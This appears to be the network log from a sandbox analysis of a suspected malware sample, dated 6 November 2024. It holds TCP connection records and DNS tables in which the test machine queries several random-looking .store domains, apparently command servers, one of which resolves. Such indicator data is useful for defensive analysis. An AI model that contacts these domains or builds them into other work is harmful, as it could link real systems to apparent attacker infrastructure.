                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.712171078 CET62148443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.712188005 CET4436214813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.726537943 CET4436214513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.726959944 CET62145443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.726974964 CET4436214513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.727500916 CET62145443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.727505922 CET4436214513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.729742050 CET4436214413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.730070114 CET62144443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.730083942 CET4436214413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.730468988 CET62144443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.730473995 CET4436214413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.855875969 CET4436214513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.855900049 CET4436214513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.855958939 CET62145443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.855962038 CET4436214513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.856007099 CET62145443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.856204987 CET62145443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.856219053 CET4436214513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.856236935 CET62145443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.856244087 CET4436214513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.859132051 CET62149443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.859177113 CET4436214913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.859251022 CET62149443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.859412909 CET62149443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.859426975 CET4436214913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.861546040 CET4436214413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.861579895 CET4436214413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.861638069 CET62144443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.861658096 CET4436214413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.861701012 CET62144443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.861787081 CET62144443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.861792088 CET4436214413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.861813068 CET62144443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.861954927 CET4436214413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.861999035 CET4436214413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.862039089 CET62144443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.864166975 CET62150443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.864202023 CET4436215013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.864274025 CET62150443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.864404917 CET62150443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:16.864414930 CET4436215013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.366574049 CET4436214713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.367110014 CET62147443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.367137909 CET4436214713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.367674112 CET62147443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.367681026 CET4436214713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.369971991 CET4436214613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.370383024 CET62146443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.370415926 CET4436214613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.370837927 CET62146443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.370845079 CET4436214613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.428790092 CET4436214813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.429295063 CET62148443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.429331064 CET4436214813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.429863930 CET62148443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.429869890 CET4436214813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.493510962 CET4436214713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.493727922 CET4436214713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.493812084 CET62147443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.493897915 CET62147443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.493921995 CET4436214713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.493933916 CET62147443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.493941069 CET4436214713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.497103930 CET62151443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.497149944 CET4436215113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.497235060 CET62151443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.497404099 CET62151443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.497416973 CET4436215113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.502665997 CET4436214613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.502736092 CET4436214613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.502804041 CET62146443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.502860069 CET62146443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.502877951 CET4436214613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.502890110 CET62146443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.502895117 CET4436214613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.504987955 CET62152443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.505028009 CET4436215213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.505095959 CET62152443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.505207062 CET62152443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.505225897 CET4436215213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.556127071 CET4436214813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.556209087 CET4436214813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.556297064 CET62148443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.556416035 CET62148443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.556438923 CET4436214813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.556449890 CET62148443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.556456089 CET4436214813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.558427095 CET62153443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.558453083 CET4436215313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.558517933 CET62153443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.558624983 CET62153443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.558639050 CET4436215313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.603183031 CET4436215013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.603909016 CET62150443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.603931904 CET4436215013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.604413033 CET62150443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.604418993 CET4436215013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.608202934 CET4436214913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.608478069 CET62149443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.608505964 CET4436214913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.608827114 CET62149443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.608834028 CET4436214913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.731525898 CET4436215013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.731880903 CET4436215013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.731928110 CET4436215013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.731940031 CET62150443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.731987000 CET62150443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.732045889 CET62150443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.732060909 CET4436215013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.732072115 CET62150443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.732078075 CET4436215013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.734781981 CET62154443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.734816074 CET4436215413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.734893084 CET62154443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.735033989 CET62154443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.735050917 CET4436215413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.737307072 CET4436214913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.737365961 CET4436214913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.737416983 CET62149443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.737588882 CET62149443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.737607002 CET4436214913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.737617970 CET62149443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:17.737623930 CET4436214913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.240905046 CET4436215213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.241548061 CET62152443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.241565943 CET4436215213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.241739988 CET4436215113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.242033005 CET62151443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.242053986 CET4436215113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.242109060 CET62152443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.242115974 CET4436215213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.242548943 CET62151443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.242556095 CET4436215113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.276736975 CET4436215313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.277229071 CET62153443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.277246952 CET4436215313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.277736902 CET62153443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.277745008 CET4436215313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.367942095 CET4436215213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.368012905 CET4436215213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.368091106 CET62152443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.368333101 CET62152443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.368352890 CET4436215213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.368362904 CET62152443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.368369102 CET4436215213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.372751951 CET4436215113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.372814894 CET4436215113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.372878075 CET62151443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.372992039 CET62151443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.372997046 CET4436215113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.373007059 CET62151443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.373011112 CET4436215113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.404189110 CET4436215313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.404261112 CET4436215313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.404333115 CET62153443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.404481888 CET62153443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.404503107 CET4436215313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.404514074 CET62153443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.404520035 CET4436215313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.464936972 CET4436215413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.465399027 CET62154443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.465415001 CET4436215413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.465864897 CET62154443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.465879917 CET4436215413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.594506025 CET4436215413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.594585896 CET4436215413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.594636917 CET62154443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.594847918 CET62154443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.594866037 CET4436215413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.594877958 CET62154443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:18.594883919 CET4436215413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:30.872596025 CET62156443192.168.2.5142.250.186.132
                                                                                                                                                                                                                            Nov 6, 2024 14:40:30.872625113 CET44362156142.250.186.132192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:30.872705936 CET62156443192.168.2.5142.250.186.132
                                                                                                                                                                                                                            Nov 6, 2024 14:40:30.872944117 CET62156443192.168.2.5142.250.186.132
                                                                                                                                                                                                                            Nov 6, 2024 14:40:30.872960091 CET44362156142.250.186.132192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:31.730360985 CET44362156142.250.186.132192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:31.730710983 CET62156443192.168.2.5142.250.186.132
                                                                                                                                                                                                                            Nov 6, 2024 14:40:31.730748892 CET44362156142.250.186.132192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:31.731129885 CET44362156142.250.186.132192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:31.731535912 CET62156443192.168.2.5142.250.186.132
                                                                                                                                                                                                                            Nov 6, 2024 14:40:31.731631041 CET44362156142.250.186.132192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:31.784642935 CET62156443192.168.2.5142.250.186.132
                                                                                                                                                                                                                            Nov 6, 2024 14:40:41.747607946 CET44362156142.250.186.132192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:41.747701883 CET44362156142.250.186.132192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:41.747771978 CET62156443192.168.2.5142.250.186.132
                                                                                                                                                                                                                            Nov 6, 2024 14:40:43.692905903 CET62156443192.168.2.5142.250.186.132
                                                                                                                                                                                                                            Nov 6, 2024 14:40:43.692943096 CET44362156142.250.186.132192.168.2.5
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.257802963 CET5302053192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.280388117 CET53530201.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.287256002 CET5093853192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.314820051 CET53509381.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.317414999 CET5082253192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.341434002 CET53508221.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.343995094 CET6108153192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.367480993 CET53610811.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.370198011 CET5400653192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.393759012 CET53540061.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.396801949 CET6395053192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.436146021 CET53639501.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.246236086 CET53548211.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.246309996 CET53623361.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.547420025 CET53612581.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:30.803148031 CET5868053192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:39:30.803340912 CET4997553192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:39:30.809853077 CET53586801.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:30.810231924 CET53499751.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.034771919 CET6158153192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.035219908 CET6391753192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.580286980 CET6074453192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.580430031 CET5180653192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.984349966 CET53501231.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.613452911 CET5494553192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.613452911 CET5658953192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:39:41.606668949 CET5364863162.159.36.2192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:42.682784081 CET53607551.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:45.968499899 CET53499441.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:04.824714899 CET53493221.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:26.047144890 CET53621331.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:27.152549982 CET53604301.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:30.863818884 CET5338453192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:40:30.863986015 CET6497053192.168.2.51.1.1.1
                                                                                                                                                                                                                            Nov 6, 2024 14:40:30.870930910 CET53533841.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:30.871717930 CET53649701.1.1.1192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:55.136255026 CET53642961.1.1.1192.168.2.5
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.257802963 CET192.168.2.51.1.1.10x871bStandard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.287256002 CET192.168.2.51.1.1.10x68bcStandard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.317414999 CET192.168.2.51.1.1.10xb05fStandard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.343995094 CET192.168.2.51.1.1.10xa251Standard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.370198011 CET192.168.2.51.1.1.10x6541Standard query (0)necklacedmny.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.396801949 CET192.168.2.51.1.1.10x6ae2Standard query (0)founpiuer.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:30.803148031 CET192.168.2.51.1.1.10xa97cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:30.803340912 CET192.168.2.51.1.1.10x9968Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.034771919 CET192.168.2.51.1.1.10x2661Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.035219908 CET192.168.2.51.1.1.10xa9e7Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.580286980 CET192.168.2.51.1.1.10x3ccdStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:32.580430031 CET192.168.2.51.1.1.10xe53Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.613452911 CET192.168.2.51.1.1.10x80a2Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.613452911 CET192.168.2.51.1.1.10xd1d4Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:40:30.863818884 CET192.168.2.51.1.1.10x71dfStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:40:30.863986015 CET192.168.2.51.1.1.10xe2b9Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.280388117 CET1.1.1.1192.168.2.50x871bName error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.314820051 CET1.1.1.1192.168.2.50x68bcName error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.341434002 CET1.1.1.1192.168.2.50xb05fName error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.367480993 CET1.1.1.1192.168.2.50xa251Name error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.393759012 CET1.1.1.1192.168.2.50x6541Name error (3)necklacedmny.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.436146021 CET1.1.1.1192.168.2.50x6ae2No error (0)founpiuer.store104.21.5.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.436146021 CET1.1.1.1192.168.2.50x6ae2No error (0)founpiuer.store172.67.133.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:30.809853077 CET1.1.1.1192.168.2.50xa97cNo error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:30.810231924 CET1.1.1.1192.168.2.50x9968No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.041096926 CET1.1.1.1192.168.2.50x4ae4No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.041465998 CET1.1.1.1192.168.2.50x2661No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.041465998 CET1.1.1.1192.168.2.50x2661No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.041465998 CET1.1.1.1192.168.2.50x2661No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 6, 2024 14:39:31.041465998 CET1.1.1.1192.168.2.50x2661No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
